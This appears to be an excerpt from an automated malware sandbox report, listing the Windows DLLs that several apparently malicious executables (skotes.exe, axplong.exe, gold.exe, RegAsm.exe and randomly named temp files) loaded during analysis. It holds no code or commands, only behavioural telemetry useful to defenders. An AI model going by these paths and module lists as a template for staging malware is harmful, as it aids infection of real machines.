                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: rstrtmgr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: rstrtmgr.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: rstrtmgr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: wsock32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: rstrtmgr.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: mstask.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: mpr.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: dui70.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: duser.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: chartv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: oleacc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: atlthunk.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: textinputframework.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: coremessaging.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: coremessaging.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: wtsapi32.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: winsta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: explorerframe.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: windows.fileexplorer.common.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: rstrtmgr.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ncrypt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ntasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: schannel.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ntasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: msasn1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: dpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: gpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ncrypt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: rstrtmgr.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ncrypt.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ntasn1.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dll
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
